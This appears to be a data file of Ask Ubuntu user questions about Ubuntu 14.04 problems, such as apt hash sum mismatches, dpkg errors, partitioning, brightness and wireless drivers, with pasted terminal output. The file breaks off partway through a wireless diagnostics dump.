468659	hash mismatch error while updating and trouble installing some packages	i am using ubuntu 14.04 and my college provides us software repositories which we can access from inside the campus . i tried installing java and only after that i started getting the hash mismatch error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openjdk-7-jdk : depends : openjdk-7-jre ( = 7u51-2.4.6-1ubuntu4 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . after this , i tried this solution , but even after removing the files in the partial folder , even on removing the entire lists folder , if i update using apt-get , i still get the error or warning : w : failed to fetch gzip : /var/lib/apt/lists/partial/repo.iitd.ernet.in_ubuntu_dists_trusty_main_binary-i386_packages hash sum mismatch i tried installing some other packages like vim , and it installed normally . so i do n't think it 's interfering with the installation of all packages . but , if i try installing the openjdk-7-jre or the icedtea-7-plugin , from my software sources i get the same error as shown above . i also tried : sudo apt-get clean none of the above solutions helped . how do i solve this hash mismatch problem without reinstalling the system because that 's the last thing on my mind right now ! ps : i am not downloading softwares from any server outside of the college and have only enabled repositories provided by my college .
468660	unable to execute .sh files in ubuntu 14.04	i am unable to run .sh file in ubuntu 14.04 . the same file was executing in earlier version 12.xx . after upgrading to 14.04 , this file stopped running . how to resolve this issue ?
468661	how to fix `` pkg_prog_pkg_config : command not found '' error ?	i have ubuntu 13.10 32 bit system . recently when i try to to compile by running ./autogen.sh and ./configure i get pkg_prog_pkg_config : command not found error . i have libtool installed . i have three aclocal files in usr/share/ like alocal , aclocal-1.13 and aclocal-1.4 how can i fix that alocal error ? edit : some time ago i compiled latest version of automake from source and installed it because a source code needed recent version of automake to run configure process . since then whenever i run standard ./autogen and /configure commands in source directory to generate makefile i get pkg_prog_pkg_config : command not found error find /usr -name `` pkg.m4 '' gives me /usr/share/aclocal/pkg.m4 and aclocal -- print-ac-dir gives me /usr/local/share/aclocal
468670	i ca n't change my brightness setting on my computer	whenever i try to change my brightness setting , it does n't change . please help me with this !
468671	how to enable c99 and c11 on gcc ?	when i compile the following code it gives compilation error that error : âforâ loop initial declarations are only allowed in c99 mode for ( int i = 0 ; i < 5 ; i++ ) and to compile your code use this option : note : use option -std=c99 or -std=gnu99 to compile your code now my question is this how to use the above option and enable c99 and c11 ?
468673	need help partitioning when reinstalling ubuntu 14.04	i upgraded to 14.04 about a month ago on my hp mini netbook ( about 16 gb hard disk ) . a few days ago the system crashed ( i do n't know why but i was using internet at the time ) . when i restarted the computer , ubuntu would not load . instead , i got a message from the bios saying reboot and select proper boot device or insert boot media in selected boot device and press a key i took this to mean that i needed to reinstall 14.04 . when i try to reinstall ubuntu from the usb stick , i choose `` erase disk and install ubuntu '' but then i get a message : some of the partitions you created are too small . please make the following partitions at least this large : / 3.3 gb if you do not go back to the partitioner and increase the size of these partitions , the installation may fail . at first i hit continue to see if it would install anyway , and it gave the message : the attempt to mount a file system with type ext4 in scsi1 ( 0,0,0 ) , partition # 1 ( sda ) at / failed . you may resume partitioning from the partitioning menu . the second time i hit go back , and it took me to the following partitioning table : device type mount point format size used system /dev/sda /dev/sda1 ext4 ( checked ) 3228 mb unknown /dev/sda5 swap ( not checked ) 1063 mb unknown + - change new partition table ... revert device for boot loader installation : /dev/sda ata jm loader 001 ( 4.3 gb ) at this point i 'm not sure what to do . i 've never partitioned my hard drive before and i do n't want to screw things up . ( i 'm not particularly tech savvy . ) can you instruct me what i should do . ( p.s . i 'm afraid the table might not appear as i typed it in . ) results from fdisk : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 4294 mb , 4294967296 bytes 255 heads , 63 sectors/track , 522 cylinders , total 8388608 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sda does n't contain a valid partition table disk /dev/sdb : 7860 mb , 7860125696 bytes 155 heads , 31 sectors/track , 3194 cylinders , total 15351808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009a565 device boot start end blocks id system /dev/sdb1 * 2768 15351807 7674520 b w95 fat32 ubuntu @ ubuntu : ~ $ here is what it displays when i open the disks utility ( i tried the screenshot terminal command you suggested but it did n't seem to do anything ) : 4.3 gb hard disk /dev/sda model : jm loader 001 ( 01000001 ) size : 4.3 gb ( 4,294,967,296 bytes ) serial number : 01234123412341234 assessment : smart is not supported volumes size : 4.3 gb ( 4,294,967,296 bytes ) device : /dev/sda contents : unknown ( there is a button in the utility that when you click it gives the following options : format ... create disk image ... restore disk image ... benchmark but smart data & self-tests ... is dimmed out ) when i hit f9 change boot device order , it shows the hard drive as : sata : pm-jm loader 001 when i hit f10 to get me into the bios setup utility , under diagnostic it shows : primary hard disk self test not support networkmanager tool state : disconnected device : eth0 type : wired driver : atl1c state : unavailable default : no hw address : 00:26:55 : b0:7f:0c capabilities : carrier detect : yes wired properties carrier : off when i run command lshw -c network , i get : warning : you should run this program as super-user . *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:16 memory : feafc000-feafffff *-network description : ethernet interface product : ar8132 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : c0 serial : 00:26:55 : b0:7f:0c capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.1-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory : febc0000-febfffff ioport : ec80 ( size=128 ) warning : output may be incomplete or inaccurate , you should run this program as super-user . additional drivers broadcom corporation : u98z049.00 wireless mini pcie card this device is not working . [ radio button not checked ] using broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) [ radio button checked ] do not use the device
468674	set print-screen shortcuts with script	distribution : ubuntu 14.04 64bit desktop question : i love using the shutter program to take/manage screenshots . however , remapping the print-screen behaviour to the appropriate shortcut keys on every computer is rather tedious . i would like be able to run a script to do this for me and others . i found this similar askubuntu question , which appears to want to do the same sort of thing ( set shortcuts through the cli ) , but unfortunately , it does n't work for me ( yet ) . i am pretty sure a few things in my script just need tweaking , or perhaps things have drastically changed between 12.10 and 14.04 ? script : # ! /bin/bash gsettings set org.gnome.desktop.wm.keybindings shutter -- select `` [ ' < shift > print ' ] '' gsettings set org.gnome.desktop.wm.keybindings shutter -- full `` [ 'print ' ] '' gsettings set org.gnome.desktop.wm.keybindings shutter -- active `` [ ' < alt > print ' ] '' example error output :
468675	ntfs formatted hard disk 's partitions not visible in windows . although they are visible in linux	i have two hard disks . hd1 has two partitions - a ntfs partitions with windows 8.1 and an ext3 with ubuntu 14.04 . hd2 has 4 ntfs partitions . both of the disks ( all partitions ) are visible on ubuntu 14.04 . and all ntfs partitions used to be visible/accessible on windows . but yesterday after upgradeding to ubuntu 14.04 from 13.10 i am unable to see any hd2 ntfs partitions on windows . in device manager panel in windows , on clicking 'scan for h/w changes ' it shows the name of my hd2 , but partitions still do n't show up in file explorer .
468680	ubuntu 14.04 lts : apt-get install fglrx : hash sum mismatch	i am trying to solve extreme slowness of ordinary text rendering in xterm on asus 102b which has graphics card as follows : lspci : 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 16h processor root complex 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] kabini [ radeon hd 8180 ] 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] device 9840 the 14.04 lts install worked out of box , but the graphics are painfully slow . i was instructed to try amd proprietary driver : apt-get install fglrx reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : fglrx-amdcccle the following new packages will be installed : fglrx fglrx-amdcccle 0 upgraded , 2 newly installed , 0 to remove and 47 not upgraded . need to get 59.2 mb/64.2 mb of archives . after this operation , 275 mb of additional disk space will be used . do you want to continue ? [ y/n ] get:1 http : //be.archive.ubuntu.com/ubuntu/ trusty/restricted fglrx amd64 2:13.350.1-0ubuntu2 [ 59.2 mb ] fetched 59.2 mb in 1min 33s ( 634 kb/s ) e : failed to fetch http : //be.archive.ubuntu.com/ubuntu/pool/restricted/f/fglrx-installer/fglrx_13.350.1-0ubuntu2_amd64.deb hash sum mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? does this mean that the package has been compromised ? what can i do to bypass this error ? -- sampo
468684	xscreensaver is not running	i am new to ubuntu and have just started using ubuntu 14.04 64 bit in my desktop . i have two problems . i have installed xscreensaver . but the problem is that , xscreensaver does not seem to work . when the system is inactive for some time , it should kick in , but it does not . startup applications show xscreensaver in the list . i have xscreensaver even in my laptop running 13.10 and there it works fine . please give a detailed step by step guide to solve it . i use a samsung 18.5 inch monitor and the optimum resolution is 1366 x 768 ( 16:9 format ) , but here in ubuntu , highest resolution i can get is 1024 x 768 ( 4:3 format ) . all the images look distorted .
468686	mac server.app equivalent for ubuntu server ?	in mac os x there is the server.app which makes all server related things simple and easy . is there something like this for ubuntu server , or at least something that easily sets up a domain name ?
468688	macbook pro 13 inch ( 2013 haswell retina ) - unable to install ubuntu 14.04	i just tried installing ubuntu 14.04 on my macbook pro ( 2013 haswell retina ) laptop and it does n't work . i 'm using the refind bootloader and i 've been able to load the live cd and run ubuntu without issue . i 'm able to connect to the internet because i 'm using an ethernet dongle - the broadcom wifi drivers were n't recognized by default . however , after installing ubuntu from the live cd interface ubuntu asks to be restarted . the installation appears to have finished because i can see it in the refind menu . i selected ubuntu and the grub boot loader loads , but ubuntu boots to a blank screen ( it looks like it 's running a command line because there is a blinking cursor ) . i 'm unable to run the recovery mode from grub because i run into similar problems . specs : macbook pro 13 inch retina ( haswell ) core i7-4558u processor ( intel iris 5100 ) i 'm not sure how to fix this so i 'd really appreciate some help . thanks .
468690	how do i delay a startup application in lubuntu ?	i want firefox to start automatically when i start lubuntu . i have the lxsession configuration app installed . in it , i 've tried entering all the suggestions in this question , such as : bash -c `` sleep 10 & & firefox '' sleep 10 & & firefox xterm -e 'sleep 10 & & firefox' sh -c `` sleep 10 & & skype & '' for all of them , they work on the command line , but not when i enter them in the lxsession configuration interface . if i enter firefox by itself , it launches when lubuntu starts . i 'm guessing all the sleep commands above only work in ubuntu . how to i get a program to delay when autostarting in lubuntu ? extra note : the reason i want to delay firefox is because i autoconnect to a vpn , and it takes a while for the vpn to complete connecting . i need firefox to start after the vpn connection is complete , so if there is any way to force one program ( like firefox ) to start upon completion of some other event ( network manager completing a connection ) , that would work too .
468691	usb mobile broadband dongles in ubuntu ( 14.04 ) ? where to start ?	your situation or what you need to get a working internet connection with a mobile broadband usb dongle : you have the usb dongle , of course . you have a 3g , 4g or whatever sim card with a data plan and also the sims pin an puk . preferably the sim card is not blocked , so you just need to enter the pin when asked for . my best and honest advice try to avoid the whole usb-modeswitch trouble by buying a mobile wi-fi hotspot . it saves you valuable time . hello frequent au users . the reason why i am asking this question : there are a lot of questions about mobile broadband usb dongles here at askubuntu , you can find them by browsing the referenced tags below . unfortunately users still seem to be lost â not knowing what to ask and where to start â also valuable answers are seemingly hard to discover . so let me start with this simple question and try to iron out this issue . yes , i try to use the spoiler tag to improve readability for non-se savvy users by hiding information .
468697	14.04 e : sub-process /usr/bin/dpkg returned an error code ( 1 )	ajith @ ajith-system-product-name : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libgc1c2 : i386 libgdbm3 : i386 libglu1-mesa : i386 libpython-stdlib : i386 libpython2.7-minimal : i386 libpython2.7-stdlib : i386 libreadline6 : i386 libsqlite3-0 : i386 libssl1.0.0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libfftw3-double3 : i386 libilmbase6 : i386 libopenexr6 : i386 suggested packages : libfftw3-bin : i386 libfftw3-dev : i386 the following packages will be upgraded : libfftw3-double3 : i386 libilmbase6 : i386 libopenexr6 : i386 3 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 10 not fully installed or removed . need to get 0 b/802 kb of archives . after this operation , 16.4 kb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 171848 files and directories currently installed . ) preparing to unpack ... /libfftw3-double3_3.3.3-7ubuntu3_i386.deb ... unpacking libfftw3-double3 : i386 ( 3.3.3-7ubuntu3 ) over ( 3.3.3-5ubuntu1 ) ... dpkg : error processing archive /var/cache/apt/archives/libfftw3-double3_3.3.3-7ubuntu3_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libfftw3-double3/changelog.debian.gz ' , which is different from other instances of package libfftw3-double3 : i386 preparing to unpack ... /libilmbase6_1.0.1-6ubuntu1_i386.deb ... unpacking libilmbase6 : i386 ( 1.0.1-6ubuntu1 ) over ( 1.0.1-6 ) ... dpkg : error processing archive /var/cache/apt/archives/libilmbase6_1.0.1-6ubuntu1_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libilmbase6/changelog.debian.gz ' , which is different from other instances of package libilmbase6 : i386 preparing to unpack ... /libopenexr6_1.6.1-7ubuntu1_i386.deb ... unpacking libopenexr6 : i386 ( 1.6.1-7ubuntu1 ) over ( 1.6.1-7 ) ... dpkg : error processing archive /var/cache/apt/archives/libopenexr6_1.6.1-7ubuntu1_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libopenexr6/changelog.debian.gz ' , which is different from other instances of package libopenexr6 : i386 errors were encountered while processing : /var/cache/apt/archives/libfftw3-double3_3.3.3-7ubuntu3_i386.deb /var/cache/apt/archives/libilmbase6_1.0.1-6ubuntu1_i386.deb /var/cache/apt/archives/libopenexr6_1.6.1-7ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ajith @ ajith-system-product-name : ~ $
468701	can not read my sd card	i know there are several topics about the fact that ubuntu can not mount and therefore can not read the sd card . all of the topics i visited : this one , this one and finally ( eventually ) that one . were not helping me . i did not find anything concerning my ubuntu os version . i run ubuntu 14.04 lts , authentically updated with the official image from 13.10 . ! there is an image attached that shows my laptop 's specific information . i have an sd card slot and it used to detect , mount and read sd cards a few months ago when i installed ubuntu 12.04 lts and with windows 8.1 . i thank you for your assistance ! regards , drummer kubuntu here is the image ; i am sorry , it 's in french edit : here is an image ... ... after having excuted `` lsblk '' onto the terminal . what should i do next ?
468704	brightness control not working aspire 4352-2852 ubuntu 14.04 lts	i 'm a newbie in ubuntu and so far it has worked really good , but there is one small problem , i ca n't control the brightness . the brightness control shows on the screen but it does n't change anything , even if the control bar moves from left lo right , the brightness is always set to the maximum . i have tried to follow a few tutorials without any success , i really do n't know anything about using the terminal or anything at all about solving issues in ubuntu . i need to be given instructions in step by step .
468705	how to combine two different installation of ubuntu ?	i have upgraded to 14.04 , installing it side by side with my ubuntu 12.04 . i have windows8 as well . so now i have three - os to boot from my laptop . ( 500 gb for win8 , 250 gb for 12.04 and ~ 200 gb for 14.04 ) i do not know why i chose that in the first go , but now i want to revert back and combine the two ubuntu 's into one , using only 14.04 . i had the option of doing a fresh install ( i could n't go for upgrade , idk why . i was using usb to install ) but installing it side by side seemed a better idea then . however , now i realize the horror i 've done . my files are a big mess and will get messier . i have no clue what is where and its an unorganized chaos . is there a way to combine 14.04 and 12.04 ? do i have to delete both of them and do a fresh install ? how to do that ?
468706	linksys wmp110 works on fresh installation , but wo n't work after reboot	i 've been at this for 2 weeks now , with no consistent success . the above nic will work on a brand new install of most distros , but after a reboot or 2 will not connect . wicd gives the bad password error , ndiswrapper does n't work , and manually managing wpa_supplicant via wpa_gui also does n't connect . the network is always seen , just ca n't connect . the router is set to aes or tkip . this same computer/nic will connect under windows . all other devices connect . other distros on other computers connect . info follows : # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux dellde051 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:31:42 utc 2014 i686 i686 i686 gnu/linux # # # # # lspci # # # # # 01:02.0 network controller [ 0280 ] : qualcomm atheros ar5416 wireless network adapter [ ar5008 802.11 ( a ) bgn ] [ 168c:0023 ] ( rev 01 ) subsystem : linksys wmp110 v1 802.11n rangeplus wireless pci adapter [ 1737:0072 ] kernel driver in use : ath9k 01:08.0 ethernet controller [ 0200 ] : intel corporation 82562ez 10/100 ethernet controller [ 8086:1050 ] ( rev 02 ) subsystem : dell device [ 1028:01d5 ] kernel driver in use : e100 # # # # # lsusb # # # # # bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 413c:3200 dell computer corp . mouse bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # iw reg get # # # # # # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : off # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e100 state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.102 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 216.144.187.199 dns : 24.229.54.212 dns : 204.186.80.229 - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : disconnected default : no hw address : < mac address removed > capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points no rent no wi-fi : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 89 wpa2 win_be68 : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 82 wpa2 linksyse : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 90 wep cisco : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 100 wpa wpa2 win_c673 : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 87 wpa wpa2 linksys : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 77 wpa # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 scan completed : cell 01 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=64/70 signal level=-46 dbm encryption key : on essid : '' cisco '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=000000138034b13d extra : last beacon : 60ms ago ie : unknown : 0005636973636f ie : unknown : 010882848b961224486c ie : unknown : 030101 ie : unknown : 32040c183060 ie : unknown : 0706555320010b10 ie : unknown : 33082001020304050607 ie : unknown : 33082105060708090a0b ie : unknown : dd270050f204104a0001101044000102104700102880288028801880a880002129d9a1ae103c000101 ie : unknown : 050400010000 ie : unknown : 2a0104 ie : unknown : 2d1aee1117ffff0000010000000000000000000000000c0000000000 ie : unknown : 3d1601050700000000000000000000000000000000000000 ie : unknown : 7f0101 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c33ee1117ffff0000010000000000000000000000000c0000000000 ie : unknown : dd1a00904c3401050700000000000000000000000000000000000000 ie : unknown : dd07000c4307000000 cell 02 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=59/70 signal level=-51 dbm encryption key : on essid : '' no rent no wi-fi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000001402deb180 extra : last beacon : 320ms ago ie : unknown : 00104e6f2052656e74204e6f2057692d4669 ie : unknown : 010882848b960c121824 ie : unknown : 030106 ie : unknown : 050401020000 ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : 2d1a6f1003ffff0000000000000000000000000000000406e6e70d00 ie : unknown : 3d1606001500000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : unknown : dd180050f2020101820003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c336f1003ffff0000000000000000000000000000000406e6e70d00 ie : unknown : dd1a00904c3406001500000000000000000000000000000000000000 ie : unknown : dd0900037f01010000ff7f ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f204104a00011010440001021049000600372a000120 # # # # # iwlist channel # # # # # wlan0 11 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz # # # # # lsmod # # # # # ath9k 144602 0 ath9k_common 13359 1 ath9k ath9k_hw 438205 2 ath9k_common , ath9k ath 23922 3 ath9k_common , ath9k , ath9k_hw mac80211 545990 1 ath9k cfg80211 409394 3 ath , ath9k , mac80211 # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko license : dual bsd/gpl description : support for atheros 802.11n wireless lan cards . author : atheros communications srcversion : baf225eeb618908380b28da alias : platform : qca955x_wmac alias : platform : ar934x_wmac alias : platform : ar933x_wmac alias : platform : ath9k alias : pci : v0000168cd00000036sv*sd*bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd00003027bc*sc*i* alias : pci : v0000168cd00000036sv00001b9asd00002810bc*sc*i* alias : pci : v0000168cd00000036sv0000144fsd00007202bc*sc*i* alias : pci : v0000168cd00000036sv00001a3bsd00002130bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000612bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000652bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000642bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd0000302cbc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003027bc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411ebc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411dbc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411cbc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411bbc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411abc*sc*i* alias : pci : v0000168cd00000036sv00001028sd0000020ebc*sc*i* alias : pci : v0000168cd00000036sv0000103csd0000217fbc*sc*i* alias : pci : v0000168cd00000036sv0000103csd000018e3bc*sc*i* alias : pci : v0000168cd00000036sv000017aasd00003026bc*sc*i* alias : pci : v0000168cd00000036sv00001a3bsd0000213abc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000662bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000672bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000622bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd00003028bc*sc*i* alias : pci : v0000168cd00000036sv0000105bsd0000e069bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd0000302bbc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003026bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003025bc*sc*i* alias : pci : v0000168cd00000036sv00001b9asd00002812bc*sc*i* alias : pci : v0000168cd00000036sv00001b9asd00002811bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00006671bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000632bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd0000a119bc*sc*i* alias : pci : v0000168cd00000036sv0000105bsd0000e068bc*sc*i* alias : pci : v0000168cd00000036sv00001a3bsd00002176bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003028bc*sc*i* alias : pci : v0000168cd00000037sv*sd*bc*sc*i* alias : pci : v0000168cd00000034sv*sd*bc*sc*i* alias : pci : v0000168cd00000034sv000010cfsd00001783bc*sc*i* alias : pci : v0000168cd00000034sv000014cdsd00000064bc*sc*i* alias : pci : v0000168cd00000034sv000014cdsd00000063bc*sc*i* alias : pci : v0000168cd00000034sv0000103csd00001864bc*sc*i* alias : pci : v0000168cd00000034sv000011adsd00006641bc*sc*i* alias : pci : v0000168cd00000034sv000011adsd00006631bc*sc*i* alias : pci : v0000168cd00000034sv00001043sd0000850ebc*sc*i* alias : pci : v0000168cd00000034sv00001a3bsd00002110bc*sc*i* alias : pci : v0000168cd00000034sv00001969sd00000091bc*sc*i* alias : pci : v0000168cd00000034sv000017aasd00003214bc*sc*i* alias : pci : v0000168cd00000034sv0000168csd00003117bc*sc*i* alias : pci : v0000168cd00000034sv000011adsd00006661bc*sc*i* alias : pci : v0000168cd00000034sv00001a3bsd00002116bc*sc*i* alias : pci : v0000168cd00000033sv*sd*bc*sc*i* alias : pci : v0000168cd00000032sv*sd*bc*sc*i* alias : pci : v0000168cd00000032sv00001043sd0000850dbc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00001c01bc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00001c00bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001f95bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001195bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001f86bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001186bc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00002001bc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00002000bc*sc*i* alias : pci : v0000168cd00000032sv0000144fsd00007197bc*sc*i* alias : pci : v0000168cd00000032sv0000105bsd0000e04fbc*sc*i* alias : pci : v0000168cd00000032sv0000105bsd0000e04ebc*sc*i* alias : pci : v0000168cd00000032sv000011adsd00006628bc*sc*i* alias : pci : v0000168cd00000032sv000011adsd00006627bc*sc*i* alias : pci : v0000168cd00000032sv00001c56sd00004001bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002100bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002c97bc*sc*i* alias : pci : v0000168cd00000032sv000017aasd00003219bc*sc*i* alias : pci : v0000168cd00000032sv000017aasd00003218bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000c708bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000c680bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000c706bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000410fbc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000410ebc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000410dbc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd00004106bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd00004105bc*sc*i* alias : pci : v0000168cd00000032sv0000185fsd00003027bc*sc*i* alias : pci : v0000168cd00000032sv0000185fsd00003119bc*sc*i* alias : pci : v0000168cd00000032sv0000168csd00003122bc*sc*i* alias : pci : v0000168cd00000032sv0000168csd00003119bc*sc*i* alias : pci : v0000168cd00000032sv0000105bsd0000e075bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002152bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd0000126abc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002126bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001237bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002086bc*sc*i* alias : pci : v0000168cd00000030sv*sd*bc*sc*i* alias : pci : v0000168cd0000002esv*sd*bc*sc*i* alias : pci : v0000168cd0000002dsv*sd*bc*sc*i* alias : pci : v0000168cd0000002csv*sd*bc*sc*i* alias : pci : v0000168cd0000002bsv*sd*bc*sc*i* alias : pci : v0000168cd0000002bsv00001a3bsd00002c37bc*sc*i* alias : pci : v0000168cd0000002asv000010cfsd00001536bc*sc*i* alias : pci : v0000168cd0000002asv000010cfsd0000147dbc*sc*i* alias : pci : v0000168cd0000002asv000010cfsd0000147cbc*sc*i* alias : pci : v0000168cd0000002asv0000185fsd0000309dbc*sc*i* alias : pci : 